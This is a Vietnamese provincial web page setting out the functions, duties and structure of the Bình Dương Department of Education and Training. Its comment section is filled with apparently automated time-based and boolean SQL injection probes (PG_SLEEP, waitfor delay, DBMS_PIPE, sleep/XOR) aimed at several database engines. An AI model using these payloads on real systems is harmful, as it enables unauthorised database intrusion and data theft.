21/04/2021 17:40:51 2.882 lượt xem

Chức năng nhiệm vụ

Chức năng, nhiệm vụ, quyền hạn và cơ cấu tổ chức
của Sở Giáo dục và Đào tạo tỉnh Bình Dương

(Ban hành kèm theo Quyết định s 02/2021/2021/QĐ-UBND
ngày 26
/3/2021 của Ủy ban nhân dân tỉnh Bình Dương)

Điều 1. Vị trí

Sở Giáo dục và Đào tạo (sau đây gọi tắt là Sở) là cơ quan chuyên môn thuộc Ủy ban nhân dân tỉnh; chịu sự chỉ đạo, quản lý về tổ chức, vị trí việc làm, biên chế và công tác của Ủy ban nhân dân tỉnh; đồng thời chịu sự chỉ đạo, hướng dẫn, kiểm tra về chuyên môn, nghiệp vụ và các quy định khác của Bộ Giáo dục và Đào tạo.

Sở có tư cách pháp nhân, có con dấu và được mở tài khoản tại Kho bạc Nhà nước.

Điều 2. Chức năng

Sở có chức năng tham mưu, giúp Ủy ban nhân dân tỉnh quản lý nhà nước về giáo dục và đào tạo ở địa phương theo quy định của pháp luật và thực hiện các nhiệm vụ, quyền hạn theo phân cấp, ủy quyền của Ủy ban nhân dân tỉnh, Chủ tịch Ủy ban nhân dân tỉnh.

Điều 3. Nhiệm vụ và quyền hạn

Sở Giáo dục và Đào tạo thực hiện nhiệm vụ, quyền hạn quy định tại Điều 12 Nghị định số 127/2018/NĐ-CP ngày 21 tháng 9 năm 2018 của Chính phủ quy định trách nhiệm quản lý nhà nước về giáo dục, Nghị định số 46/2017/NĐ-CP ngày 21 tháng 4 năm 2017 của Chính phủ quy định về điều kiện đầu tư và hoạt động trong lĩnh vực giáo dục, Nghị định số 135/2018/NĐ-CP ngày 04/10/2018 của Chính phủ sửa đổi, bổ sung một số điều của Nghị định số 46/2017/NĐ-CP; Nghị định số 86/2018/NĐ-CP ngày 06 tháng 6 năm 2018 của Chính phủ quy định về hợp tác, đầu tư của nước ngoài trong lĩnh vực giáo dục, các quy định của pháp luật có liên quan và thực hiện các nhiệm vụ, quyền hạn sau:

1. Chủ trì, phối hợp với các cơ quan có liên quan trình Ủy ban nhân dân tỉnh:

a) Dự thảo quyết định phân cấp, ủy quyền nhiệm vụ quản lý nhà nước về ngành, lĩnh vực cho Sở, Ủy ban nhân dân cấp huyện;

b) Dự thảo quyết định, quy định cụ thể chức năng, nhiệm vụ, quyền hạn và cơ cấu tổ chức của Sở;

c) Dự thảo quyết định thực hiện xã hội hóa các hoạt động cung ứng dịch vụ sự nghiệp công theo ngành, lĩnh vực thuộc thẩm quyền của Ủy ban nhân dân tỉnh và theo phân cấp của cơ quan nhà nước cấp trên;

d) Ban hành văn bản hướng dẫn, tổ chức thực hiện các văn bản pháp luật về giáo dục; phương án tích hợp nội dung về mạng lưới các cơ sở giáo dục và đào tạo vào quy hoạch tỉnh theo Luật Quy hoạch và các quy định có liên quan; kế hoạch phát triển giáo dục trên địa bàn; kế hoạch, chương trình, dự án phát triển giáo dục trung học phổ thông trên địa bàn; kế hoạch triển khai Đề án đổi mới chương trình, sách giáo khoa giáo dục phổ thông được phân công trên phạm vi địa bàn tỉnh; các văn bản pháp luật về giáo dục theo thẩm quyền;

đ) Văn bản chấp thuận về việc thành lập, cho phép thành lập; sáp nhập, chia, tách, giải thể cơ sở giáo dục đại học, phân hiệu của cơ sở giáo dục đại học; trường cao đẳng sư phạm, phân hiệu của trường cao đẳng sư phạm trên địa bàn tỉnh;

e) Phê duyệt Đề án sắp xếp, tổ chức lại các cơ sở giáo dục công lập thuộc phạm vi quản lý phù hợp với thực tiễn của tỉnh Bình Dương;

g) Phê duyệt phương án thành lập, tổ chức lại, giải thể các phòng chuyên môn, nghiệp vụ thuộc Sở Giáo dục và Đào tạo theo quy định.

2. Trình Chủ tịch Ủy ban nhân dân tỉnh dự thảo các văn bản thuộc thẩm quyền ban hành của Chủ tịch Ủy ban nhân dân tỉnh theo phân công.

3. Phối hợp Sở Nội vụ tổng hợp số lượng người làm việc hàng năm của các cơ sở giáo dục công lập trong kế hoạch số lượng người làm việc trong các đơn vị sự nghiệp công lập của tỉnh trình cơ quan có thẩm quyền phê duyệt.

4. Chủ trì, phối hợp với các đơn vị có liên quan tổ chức tuyển dụng hoặc phân cấp việc tuyển dụng, sử dụng, đào tạo, bồi dưỡng nhà giáo, cán bộ quản lý giáo dục, nhân viên trong các cơ sở giáo dục công lập trực thuộc Sở theo quy định của pháp luật.

5. Chủ trì, phối hợp với các cơ quan có liên quan tham mưu Ủy ban nhân dân tỉnh thực hiện chức năng quản lý nhà nước về giáo dục và đào tạo đối với các cơ sở giáo dục đại học; trung tâm giáo dục thường xuyên tỉnh theo phân cấp của Chính phủ.

6. Hướng dẫn chuyên môn, nghiệp vụ đối với Phòng Giáo dục và Đào tạo và người có chức danh theo dõi giáo dục thuộc Ủy ban nhân dân xã, phường, thị trấn. Quản lý về chuyên môn đối với việc thực hiện chương trình giáo dục thường xuyên của các trung tâm cấp huyện theo quy định.

7. Hướng dẫn thực hiện cơ chế tự chủ đối với các đơn vị sự nghiệp công lập thuộc ngành, lĩnh vực quản lý theo quy định của pháp luật; quản lý hoạt động của các đơn vị sự nghiệp trong và ngoài công lập thuộc phạm vi ngành, lĩnh vực.

8. Quản lý các hoạt động dạy học, giáo dục trong nhà trường và ngoài nhà trường; chỉ đạo thực hiện hoạt động giáo dục đạo đức, lối sống, an toàn trường học; tổ chức thực hiện kế hoạch triển khai Đề án đổi mới chương trình, sách giáo khoa giáo dục phổ thông; thực hiện và chỉ đạo thực hiện công tác truyền thông giáo dục trên địa bàn.

9. Tham gia thẩm định thực tế đề án thành lập, cho phép thành lập cơ sở giáo dục đại học, phân hiệu của cơ sở giáo dục đại học trên địa bàn.

10. Thường xuyên cập nhật thông tin về đội ngũ nhà giáo và cán bộ quản lý giáo dục thuộc phạm vi quản lý vào cơ sở dữ liệu ngành giáo dục. Thực hiện đầy đủ và kịp thời chế độ báo cáo định kỳ hàng năm và đột xuất về thống kê, công khai lĩnh vực giáo dục của địa phương thuộc phạm vi quản lý với Ủy ban nhân dân tỉnh và Bộ Giáo dục và Đào tạo theo quy định.

Điều 4. Cơ cấu tổ chức

1. Các phòng chuyên môn, nghiệp vụ

- Văn phòng;

- Thanh tra;

- Phòng Tổ chức cán bộ;

- Phòng Kế hoạch - Tài chính;            

- Phòng Giáo dục Mầm non và Tiểu học;

- Phòng Giáo dục Trung học - Thường xuyên;

- Phòng Khảo thí và Quản lý chất lượng giáo dục.

Mỗi tổ chức trên đây có 01 cấp trưởng và không quá 02 cấp phó. Các chức vụ này do Giám đốc Sở bổ nhiệm, miễn nhiệm. Riêng chức vụ Chánh Thanh tra do Giám đốc Sở bổ nhiệm, miễn nhiệm sau khi thỏa thuận với Chánh Thanh tra tỉnh.

Số lượng cấp phó của mỗi tổ chức thực hiện theo tiêu chí số lượng biên chế công chức quy định cụ thể tại khoản 4 Điều 1 Nghị định số 107/2020/NĐ-CP ngày 14 tháng 9 năm 2020 của Chính phủ.

2. Đơn vị sự nghiệp công lập thuộc Sở:

- Các trường trung học phổ thông;

- Trung tâm Giáo dục thường xuyên và Bồi dưỡng nghiệp vụ.

Điều 5. Lãnh đạo Sở

1. Sở có Giám đốc và không quá 03 Phó Giám đốc;

2. Giám đốc Sở là người đứng đầu Sở, chịu trách nhiệm trước Ủy ban nhân dân tỉnh, Chủ tịch Ủy ban nhân dân tỉnh và trước pháp luật về thực hiện chức năng, nhiệm vụ, quyền hạn của Sở; thực hiện các chức trách, nhiệm vụ của Giám đốc Sở được quy định tại Điều 7 Nghị định số 24/2014/NĐ-CP ngày 04/4/2014 của Chính phủ quy định tổ chức các cơ quan chuyên môn thuộc Ủy ban nhân dân tỉnh, thành phố trực thuộc Trung ương;

3. Phó Giám đốc Sở là người giúp Giám đốc Sở phụ trách, chỉ đạo thực hiện công tác của một số phòng chuyên môn, nghiệp vụ và đơn vị sự nghiệp trực thuộc Sở, chịu trách nhiệm trước Giám đốc Sở và trước pháp luật về nhiệm vụ được phân công. Khi Giám đốc Sở vắng mặt, một Phó Giám đốc Sở được Giám đốc Sở ủy nhiệm điều hành các hoạt động của Sở;

4. Giám đốc có thể ủy quyền cho Phó Giám đốc giải quyết các công việc cụ thể khác và các Phó Giám đốc không được ủy quyền lại cho công chức cấp dưới;

6. Việc bổ nhiệm, bổ nhiệm lại, miễn nhiệm, điều động, luân chuyển, khen thưởng, kỷ luật, cho từ chức, nghỉ hưu và thực hiện các chế độ, chính sách đối với Giám đốc Sở và Phó Giám đốc Sở do Chủ tịch Ủy ban nhân dân tỉnh quyết định theo quy định của Đảng và Nhà nước.

Điều 6. Chế độ làm việc

1. Sở làm việc theo chương trình, kế hoạch công tác hàng năm do Ủy ban nhân dân tỉnh giao và theo chức năng, nhiệm vụ, quyền hạn được quy định trong bản Quy định này.

2. Sở làm việc theo chế độ thủ trưởng, bảo đảm nguyên tắc tập trung dân chủ. Giám đốc Sở là người đứng đầu Sở, chịu trách nhiệm trước Ủy ban nhân dân tỉnh, Chủ tịch Ủy ban nhân dân tỉnh và trước pháp luật trong việc thực hiện chức năng, nhiệm vụ, quyền hạn quản lý nhà nước về lĩnh vực giáo dục và đào tạo trên địa bàn tỉnh và các công việc được Ủy ban nhân dân tỉnh, Chủ tịch Ủy ban nhân dân tỉnh phân công hoặc ủy quyền; đồng thời chịu trách nhiệm trước Bộ trưởng Bộ Giáo dục và Đào tạo về các vấn đề thuộc lĩnh vực công tác chuyên môn, nghiệp vụ của ngành.

3. Các tổ chức tham mưu, tng hợp, chuyên môn nghiệp vụ và các đơn vị sự nghiệp thuộc Sở làm việc theo chế độ Thủ trưởng, thực hiện chức năng, nhiệm vụ, quyền hạn theo quy định và chịu trách nhiệm trước Giám đốc Sở và trước pháp luật về kết quả hoạt động của đơn vị và công việc được phân công.

Điều 7.Mối liên hệ công tác

1. Đối với Bộ Giáo dục và Đào tạo

Sở chịu sự chỉ đạo, hướng dẫn, kiểm tra về chuyên môn, nghiệp vụ và các mặt công tác do Bộ Giáo dục và Đào tạo phụ trách. Giám đốc Sở có trách nhiệm báo cáo tình hình công tác chuyên môn cho Bộ Giáo dục và Đào tạo theo chế độ định kỳ và theo yêu cầu đột xuất.

2. Đối với y ban nhân dân tỉnh

Sở chịu sự lãnh đạo trực tiếp và toàn diện của Ủy ban nhân dân tỉnh. Giám đốc Sở có trách nhiệm báo cáo tình hình công tác theo chế độ định kỳ và theo yêu cầu đột xuất với Ủy ban nhân dân tỉnh. Trước khi tổ chức thực hiện các chương trình công tác của Bộ Giáo dục và Đào tạo và các ngành Trung ương có liên quan đến chương trình, kế hoạch chung của tỉnh, Sở phải báo cáo xin ý kiến chỉ đạo của Ủy ban nhân dân tỉnh.

3. Đối với các sở, ban, ngành, đoàn thể của tỉnh và Ủy ban nhân dân các huyện, thị xã, thành phố

Sở xây dựng mối quan hệ phối hợp chặt chẽ với các sở, ban, ngành, đoàn thể của tỉnh và Ủy ban nhân dân các huyện, thị xã, thành phố đối với các mặt công tác thuộc chức năng quản lý của Sở về công tác giáo dục và đào tạo.

Trong phạm vi nhiệm vụ được phân công, Sở Giáo dục và Đào tạo được yêu cu các sở, ban, ngành, đoàn thể, Ủy ban nhân dân các huyện, thị xã, thành phố báo cáo tình hình và các vấn đề có liên quan bằng văn bản hoặc trực tiếp trao đổi đ trin khai thực hiện nhiệm vụ được phân công theo sự chỉ đạo của Bộ Giáo dục và Đào tạo và y ban nhân dân tỉnh.

4. Đối với các cơ quan, đơn vị của Trung ương và các tỉnh, thành phố khác trú đóng và hoạt động trên địa bàn của tỉnh, Sở giữ mối quan hệ chặt chẽ với các cơ quan, đơn vị này đ giúp y ban nhân dân tỉnh thực hiện nhiệm vụ quản lý nhà nước v lĩnh vực công tác giáo dục và đào tạo.

Điều 8. Trách nhiệm thc hiện

1. Căn cứ Quy định này, Giám đốc Sở có trách nhiệm ban hành Quy chế làm việc của các phòng, đơn vị trực thuộc; quy định cụ thể về chế độ làm việc, chế độ quản lý theo từng lĩnh vực; t chức sp xếp các phòng, đơn vị theo hướng tinh gọn, hiệu quả; b trí cán bộ, công chức phù hợp với yêu cu nhim vụ chuyên môn, bảo đảm phát huy tt hiệu lực, hiệu quả quản lý nhà nước mà Sở đưc phân công, phân cp thực hiện trên địa bàn tỉnh.

2. Cơ cấu tổ chức của Sở thực hiện theo  quy định của Chính phủ.

3. Việc sửa đổi, bổ sung, thay thế các nội dung trong bản Quy định này do Giám đc Sở Giáo dục và Đào tạo thống nhất với Giám đốc Sở Nội vụ trình Ủy ban nhân dân tỉnh xem xét, quyết định./.

 

Ý kiến đọc giả

Bình luận (52)

Chưa có bình luận

Đang chờ phê duyệt

testing@example.com 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

3 tuần trước

testing@example.com 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

3 tuần trước

testing@example.com 7zZU3G9p')) OR 858=(SELECT 858 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com nDR1oIGN') OR 433=(SELECT 433 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com SohjO1eL' OR 288=(SELECT 288 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com -1)) OR 284=(SELECT 284 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com -5) OR 528=(SELECT 528 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com -5 OR 129=(SELECT 129 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com xJhY4Gtg'; waitfor delay '0:0:15' --

3 tuần trước

testing@example.com 1 waitfor delay '0:0:15' --

3 tuần trước

testing@example.com -1); waitfor delay '0:0:15' --

3 tuần trước

testing@example.com -1; waitfor delay '0:0:15' --

3 tuần trước

testing@example.com (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

3 tuần trước

testing@example.com 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

3 tuần trước

testing@example.com 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

3 tuần trước

testing@example.com if(now()=sysdate(),sleep(15),0)

3 tuần trước

testing@example.com -1" OR 3+368-368-1=0+0+0+1 --

3 tuần trước

testing@example.com -1" OR 2+368-368-1=0+0+0+1 --

3 tuần trước

testing@example.com -1' OR 3+33-33-1=0+0+0+1 or 'Z4385Va3'='

3 tuần trước

testing@example.com -1' OR 2+33-33-1=0+0+0+1 or 'Z4385Va3'='

3 tuần trước

testing@example.com -1' OR 3+946-946-1=0+0+0+1 --

3 tuần trước

testing@example.com -1' OR 2+946-946-1=0+0+0+1 --

3 tuần trước

testing@example.com -1 OR 3+601-601-1=0+0+0+1

3 tuần trước

testing@example.com -1 OR 2+601-601-1=0+0+0+1

3 tuần trước

testing@example.com -1 OR 3+70-70-1=0+0+0+1 --

3 tuần trước

testing@example.com -1 OR 2+70-70-1=0+0+0+1 --

3 tuần trước

testing@example.com 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

3 tuần trước

testing@example.com 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

3 tuần trước

testing@example.com ZQZVp3WG')) OR 365=(SELECT 365 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com SgnCaD8v') OR 10=(SELECT 10 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com PxNp4Tvw' OR 854=(SELECT 854 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com -1)) OR 829=(SELECT 829 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com -5) OR 968=(SELECT 968 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com -5 OR 297=(SELECT 297 FROM PG_SLEEP(15))--

3 tuần trước

testing@example.com SH2fBZXq'; waitfor delay '0:0:15' --

3 tuần trước

testing@example.com 1 waitfor delay '0:0:15' --

3 tuần trước

testing@example.com -1); waitfor delay '0:0:15' --

3 tuần trước

testing@example.com -1; waitfor delay '0:0:15' --

3 tuần trước

testing@example.com (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

3 tuần trước

testing@example.com 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

3 tuần trước

testing@example.com 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

3 tuần trước

testing@example.com if(now()=sysdate(),sleep(15),0)

3 tuần trước

testing@example.com -1" OR 3+670-670-1=0+0+0+1 --

3 tuần trước

testing@example.com -1" OR 2+670-670-1=0+0+0+1 --

3 tuần trước

testing@example.com -1' OR 3+866-866-1=0+0+0+1 or '0GqQfn8j'='

3 tuần trước

testing@example.com -1' OR 2+866-866-1=0+0+0+1 or '0GqQfn8j'='

3 tuần trước

testing@example.com -1' OR 3+230-230-1=0+0+0+1 --

3 tuần trước

testing@example.com -1' OR 2+230-230-1=0+0+0+1 --

3 tuần trước

testing@example.com -1 OR 3+320-320-1=0+0+0+1

3 tuần trước

testing@example.com -1 OR 2+320-320-1=0+0+0+1

3 tuần trước

testing@example.com -1 OR 2+303-303-1=0+0+0+1 --

3 tuần trước

testing@example.com -1 OR 3+303-303-1=0+0+0+1 --

3 tuần trước

Hoạt động giáo dục

Xem bằng ngôn ngữ khác